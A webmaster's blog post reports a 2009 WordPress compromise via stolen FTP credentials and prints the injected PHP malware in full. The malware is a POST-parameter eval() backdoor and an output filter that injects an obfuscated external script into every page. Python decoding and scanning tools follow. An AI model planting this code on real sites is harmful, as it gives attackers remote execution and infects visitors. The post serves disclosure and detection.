Yesterday my blog was (most likely) hacked: some strange code was written to index.php, wp-settings.php and wp-config.php, as well as to some files in the wp-includes folder. I Googled the line of code, and it seems many WordPress blogs running version 2.7.1 have been hacked in the last few days.

The code that was written on line 1 of the files (the blog's smart quotes and line-wrapped base64 have been restored to what the malware actually contains; the comments describe what each part does):

if(!function_exists('tmp_lkojfghx')){
  // Backdoor: anything POSTed as tmp_lkojfghx3 is executed as PHP with no authentication.
  if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
  // Payload: a base64-encoded, obfuscated <script> block (a document.write() of an external
  // <script src=...> include) that is inserted into every HTML page the site serves.
  if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0N5aHNkQzNjeWhyMkdpcHQlMjBzcmN5aCUzRCUyRlRNJTJGOVhwdjQlMkUyNDdkQzMlMkVUTTIlMkVYcHYxS2U5VE01JTJGalJpN3FkQzN1ZEMzZVJpN3J5ZEMzJTJFanMlM0V5aCUzQyUyRnloc2M3SzJyaXB0eWglM0UnKS5yZXBsYWNlKC9kQzN8WWlmfHlofFJpN3xLZXxUTXwyR3w3SzJ8WHB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));
  // Output-buffer callback: rewrites the finished page body before it is sent to the browser.
  function tmp_lkojfghx($s){
    // Transparently handle gzip-compressed output (magic bytes 1f 8b) and re-compress on the way out.
    if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
    // Remove other obfuscated <script> blocks (long unbroken strings or char-code arrays combined
    // with eval/fromCharCode/document.write), i.e. competing injections from other malware.
    if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){
      $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
      if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
    }
    // Strip any earlier copy of its own payload, then put it just before <body>, or append it if the
    // output still looks like HTML (</body> or </title> present); non-HTML output is left untouched.
    $s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
    if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
    elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
    return $g?gzencode($s):$s;
  }
  // Installed as the PHP error handler and also called once at load time: on every notice or warning
  // it unwinds the output-buffer stack, puts tmp_lkojfghx() at the bottom and restores the original
  // handlers on top, so the filter survives WordPress's own ob_start() calls.
  function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
    $s=array();
    // Chain to whatever error handler was installed before, so nothing visibly breaks.
    if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
    foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
    for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
    ob_start('tmp_lkojfghx');
    for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
  }
}
// Remember the previous error handler (if any) and hook the output buffers immediately.
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2();
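To see what the base64 constant actually puts into every page, here is an added example in Python (not part of the original post and not the malware's own code). It base64-decodes TMP_XHGFJOKL, pulls the percent-encoded string out of the unescape() call, strips the junk tokens the JavaScript removes with .replace(/.../g, ""), and returns the real <script src=...> tag; a second function emulates only the placement rule of the output filter above (insert before <body>, otherwise append when the output looks like HTML, otherwise leave alone). The function names are my own; the only input is the base64 literal from the injected code.

```python
"""Unpack the TMP_XHGFJOKL constant and emulate where the output filter puts it.

Added example; not part of the original post and not the malware's own code.
"""
import base64
import re
from urllib.parse import unquote

# The base64 literal from define('TMP_XHGFJOKL', base64_decode('...')) in the
# injected code, with the spaces introduced by the blog's line wrapping removed.
TMP_XHGFJOKL_B64 = (
    "PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBl"
    "KCclM0N5aHNkQzNjeWhyMkdpcHQlMjBzcmN5aCUzRCUyRlRNJTJGOVhwdjQlMkUyNDdkQzMlMkVU"
    "TTIlMkVYcHYxS2U5VE01JTJGalJpN3FkQzN1ZEMzZVJpN3J5ZEMzJTJFanMlM0V5aCUzQyUyRnlo"
    "c2M3SzJyaXB0eWglM0UnKS5yZXBsYWNlKC9kQzN8WWlmfHlofFJpN3xLZXxUTXwyR3w3SzJ8WHB2"
    "L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=="
)


def decode_constant(b64: str) -> str:
    """PHP's base64_decode() step: the raw <script> block the filter inserts."""
    return base64.b64decode(b64).decode("ascii")


def unpack_document_write(script_block: str) -> str:
    """Do what the browser does with the block: unescape('...') the percent-encoded
    string, then drop the junk tokens listed in .replace(/a|b|c/g, ""), leaving
    the HTML that document.write() really emits."""
    m = re.search(r"unescape\('([^']*)'\)\.replace\(/([^/]*)/g,\"\"\)", script_block)
    if not m:
        raise ValueError("script block does not match the unescape().replace() pattern")
    encoded, junk_alternation = m.group(1), m.group(2)
    decoded = unquote(encoded)
    # The JS regex is a plain alternation of literal tokens in a fixed order;
    # Python's re picks the first matching alternative at each position, as JS does.
    junk = re.compile("|".join(re.escape(t) for t in junk_alternation.split("|")))
    return junk.sub("", decoded)


def emulate_filter(html: str, payload: str) -> str:
    """Mirror the placement logic of the PHP output filter tmp_lkojfghx():
    put the payload just before <body>; otherwise append it when the document
    still looks like HTML (</body> or </title> present); otherwise leave the
    output untouched, so feeds and AJAX responses never show the infection.
    (The PHP also strips its own earlier copy first; that step is not emulated.)"""
    if re.search(r"<body", html, re.I):
        return re.sub(r"(\s*<body)", lambda m: payload + m.group(1), html, flags=re.I)
    if re.search(r"</body|</title>", html, re.I):
        return html + payload
    return html


if __name__ == "__main__":
    block = decode_constant(TMP_XHGFJOKL_B64)
    print(block)
    print("document.write() emits:", unpack_document_write(block))
```

The decoded block is the string the $s1 regex in the PHP looks for, which is how the filter avoids injecting itself twice; the unpacked tag is the indicator to search for in served pages and in proxy logs.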

I hope they come up with a patch soon, because I think this is a WordPress vulnerability and has nothing to do with any webhotel or PHP hacks, but it's hard to say for sure at this point. What I did to fix it was to re-upload those 3 files and the whole wp-includes directory all over again, and I got access again. Then I suppose one had better change the database passwords etc.

Update #1: I also found an index.php file under wp-content/uploads which contained the above code and a comment "Silence is golden".

Update #2: The file described in update #1 should perhaps be there, with the comment, but there should be no PHP code in it. I still have no information about how this hack was performed and what it does, but it is likely that the problem is in one of the plugins rather than in WordPress itself.
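A small triage scanner for the symptoms described above and in updates #1 and #2, as an added example (not the author's own tooling and not part of WordPress): it walks a document root, reports PHP files containing the marker names tmp_lkojfghx / TMP_XHGFJOKL, an eval() of request data, or a define() wrapping base64_decode(), with the line of the first hit (the post says the code sat on line 1), and flags any index.php under wp-content/uploads that holds more than the "Silence is golden" comment. The signature names, the sample tree built by build_sample_tree() and its file contents are constructed for the demonstration.

```python
"""Triage a WordPress tree for the injected PHP described in this post.

Added example; not the post author's own tooling and not part of WordPress.
"""
import os
import re
import tempfile
from dataclasses import dataclass

# Signatures taken from the injected code shown earlier in the post.
SIGNATURES = {
    "marker-name": re.compile(r"tmp_lkojfghx|TMP_XHGFJOKL"),
    "request-eval": re.compile(r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\["),
    "b64-define": re.compile(r"define\s*\(\s*['\"][^'\"]+['\"]\s*,\s*base64_decode\s*\("),
}

# A clean placeholder index.php holds the comment and nothing else.
SILENCE = re.compile(r"^\s*<\?php\s*//\s*Silence is golden\.?\s*(?:\?>)?\s*$")


@dataclass(frozen=True)
class Finding:
    relpath: str   # path relative to the scanned root, '/'-separated
    reason: str
    line: int      # 1-based line of the first hit; 0 for file-level findings


def scan_file(root: str, path: str) -> list:
    with open(path, encoding="utf-8", errors="replace") as f:
        text = f.read()
    rel = os.path.relpath(path, root).replace(os.sep, "/")
    found = []
    for reason, rx in SIGNATURES.items():
        m = rx.search(text)
        if m:
            found.append(Finding(rel, reason, text.count("\n", 0, m.start()) + 1))
    # Update #2: the uploads placeholder may exist, but must contain no PHP code.
    if rel.startswith("wp-content/uploads/") and rel.endswith("/index.php") and not SILENCE.match(text):
        found.append(Finding(rel, "uploads-index-not-placeholder", 0))
    return found


def scan_tree(root: str) -> list:
    results = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.endswith(".php"):
                results.extend(scan_file(root, os.path.join(dirpath, fn)))
    return sorted(results, key=lambda f: (f.relpath, f.reason))


# Constructed sample files (abbreviated: the real injection is one long line,
# and the base64 here is a placeholder, not the real payload).
INJECTED_LINE = ("<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))"
                 "eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))"
                 "define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdD4='));} ?>")

SAMPLE_FILES = {
    "index.php": INJECTED_LINE + "<?php\n/** constructed: front controller */\nrequire('./wp-blog-header.php');\n",
    "wp-settings.php": "<?php\n// constructed clean file: output buffering alone is not a signature\nob_start();\n",
    "wp-content/uploads/index.php": "<?php\n// Silence is golden.\n"
                                    "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);\n",
    "wp-content/uploads/2009/index.php": "<?php\n// Silence is golden.\n",
}


def build_sample_tree() -> str:
    """Write the constructed sample files into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="wpscan-")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as f:
            f.write(body)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f"{f.relpath}:{f.line} {f.reason}")
```

Point scan_tree() at the real document root instead of the sample tree; a hit on line 1 of a core file, or any PHP beyond the comment in an uploads index.php, is the pattern this post describes. Since the files were replaced over FTP (update #3), re-uploading clean copies only helps after the stolen credentials have been changed.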

Update #3: Today (2009-04-06) I got the logs from Loopia, my webhotel, and they show that the hack was performed via FTP: some of the files on my account were replaced from an IP address located in Norway, most likely via some VPN service. There were some other sites of mine that also got some strange JavaScript inserted into them, and those pages have now also been replaced with the original ones. I have notified Loopia about the incident and alerted them to the possibility that the hack might not be limited to my account but could involve their customer database. The hack seemed to be very automated anyway, and I have now changed passwords etc.

Update #4: I noticed that another site of mine, on another webhotel, has also been hacked in the exact same way. So it would seem I've gotten some spyware on my computer stealing FTP passwords. So, now at least I know it's probably all my fault, too much porn perhaps… The computer will be reinstalled tomorrow and all passwords changed.

I will post updates when I know more about what happened and why.